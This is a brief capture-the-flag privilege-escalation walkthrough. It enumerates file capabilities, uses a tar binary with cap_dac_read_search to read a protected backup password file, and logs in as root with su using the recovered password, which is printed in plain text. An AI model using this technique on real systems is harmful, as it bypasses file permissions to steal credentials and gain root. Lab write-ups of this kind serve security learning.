Priv Esc

ls -la

.2uqPEfj3D<P'a-3

 getcap -r / 2>/dev/null

cap_dac_read_search allows us to "Bypass file read permission checks and directory read and execute permission checks"

ls -la /var/backups

/home/cyber/tar -cf privme /var/backups/.old_pass.bak
/home/cyber/tar -xf privme.tar

Ts&4&YurgtRX(=~h

su root
Ts&4&YurgtRX(=~h

Last updated 1 year ago